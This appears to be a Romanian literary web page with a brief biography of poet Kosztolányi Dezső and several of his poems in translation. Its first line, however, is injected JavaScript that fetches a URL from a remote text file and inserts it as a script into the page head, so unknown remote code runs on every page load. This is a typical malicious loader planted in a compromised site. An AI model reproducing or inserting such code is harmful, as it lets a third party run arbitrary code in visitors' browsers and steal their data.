;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
Kosztolányi Dezső s-a născut la 29 martie 1885 la Szabadka (azi Subotica, Serbia). Remarcabil poet, prozator, traducător, considerat unul dintre înnoitorii limbajului poetic maghiar, aflat sub influenţa curentului simbolist, dar şi al prozei impresioniste, în care a excelat, romanul Édes Anna fiind o capodoperă a romanului psihanalitic. A publicat mai mult volume de poezii şi un volum de traduceri din lirica europeană şi americană, intitulat Modern Költők (Poeţi moderni). A făcut parte din prima generaţie a revistei Nyugat, alături de Osvát Ernő, Ignotus, Ady Endre, Móricz Zsigmond, Tóth Árpád, Babits Mihály ş.a. A murit la 3 noiembrie 1936 la Budapesta.
Tu uiţi ce ai mâncat la prânz,
cu cine-ai vorbit ieri, cine ţi-e duşman, prieten,
pentru că eşti bogat şi uituc.
Îţi părăseşti sentimentele ca pe nişte
ziare citite într-un compartiment de tren
şi goneşti mai departe,
salutându-l pe unul, zâmbindu-i altuia,
distrat peste măsură.
Dar sărmanii încă ştiu şi acum
ce le-ai spus în urmă cu cinci ani,
când ai trecut pe o stradă din Budapesta
şi le-ai mângâiat pe creştet copilul blond
care a murit între timp
şi devine ţărână în cimitirul din Tabán.
Ei fac pavăză la tot ce-i viaţă,
pun deoparte tot ce ai atins, cum e
şi cutia ordinară de tablă în care alţii
şi-au păstrat odinioară ţigările.
Sărmanii stau de veghe,
au grijă de tot ce li-e dat,
trăiesc şi-n locul tău
şi nu uită nimic.
Cât de repede te-ndepărtezi de mine
în timpul nemăsurat, copile.
Te ridici agitat de la masa de prânz,
dispari, goneşti.
Când îţi vorbesc, citeşti ziarul
şi-mi răspunzi succint.
Eşti cu prietenii. Camera ţi-e goală.
Mie sufletul mi-e gol.
Nu-mi vezi pe faţă dragostea naivă.
Nu mă bagi în seamă.
Glasu-mi scrâşnit ţi-e insuportabil.
Şi mâna mi-e grea.
Maică-te mi-e din nou unica prietenă.
Cu ea stau de vorbă.
În şoaptă-i amintesc de anii de hârjoană,
Ca tu să nu ne-auzi.
Aşa l-am părăsit şi eu pe tata odinioară.
Aşa a plecat şi el.
Cu greu suspin, mândru, blestemat,
Fără să se uite îndărăt.
O, singurătatea asta asemeni celei vechi,
Când tu încă nu trăiai.
Dimineţile îmi presară pe creştet cenuşă,
Amiezile au devenit cenuşii.
Seara, în grădină, contemplu cerul,
Pomii, frunzişul
Şi mă-ntreb pe mine însumi fructul
De ce nu înţelege trunchiul?
Tâmplele orelor pulsează:
timpul a prins fierbinţeală.
Nici nu ştiu ce mi se-ntâmplă.
Văd ceasul.
Văd toate ceasurile din lume,
cele ce se grăbesc, cele ce rămân în urmă.
Aud bătaia ceasului şi a clopotului
chiar şi în vis.
Simt minutul.
Pe masa calmă de sufragerie, între lingură
şi furculiţă, sesizez cuţitul, cuţitul ucigător
care destramă destine, taie în două orice,
pe gură semnul care dezvăluie o viaţă,
sabia din cuvânt.
Tâmplele orelor pulsează:
timpul a prins fierbinţeală.
Stau destins, culcat pe canapeaua
narcisismului arogant, pe plapumă cade galbenă
lumină electrică de noapte, potop solar de zi.
Lenevesc între fum de ţigară şi cafea,
întrucât soarta mea e doar de a fi, asta e
treaba mea.
Valorăm doar cât preţuim în de sine, ce-mi
trebuie mie nimbul minciunii,
al muncii.
La ce-mi trebuie vorbăria falşilor profeţi,
nu mă tocmesc în niciun fel cu urâtul,
nici cu gloata ce urlă după minge,
nici cu procente, nici cu Hollywood-ul.
Din parte-mi, mintea lucidă poate bălmăji
vorbe mântuitoare şi sminteli plictisitoare,
paiaţa de cârpe a veacului nu-i a mea,
nici mecanicul tâmp din nori, cu zuruitoare.
Nu-mi trebuie ciolanul ales al celor puternici,
nici bunăvoinţa milioanelor, ieftin-vetustă.
Eu proclam, prieteni, că doi e mult,
dar unu e cifra robustă.
Trosnească trecutul şi viitorul neghiob,
eu trebuie să apăr o comoară de nepreţuit.
Domnesc şi peste crateru-i de vulcan
până tronul mi-e neclintit.
Şi pe mine cu mine însumi
să mă măsor mi-e dat.
Când îmi răsună cuvântul, e monedă
de aur curat.
Pe fiecare, precum al unui rege, chipul meu
iar pe margini
scrisul trufaş:
eu.
Prezentare şi traducere de Kocsis Francisko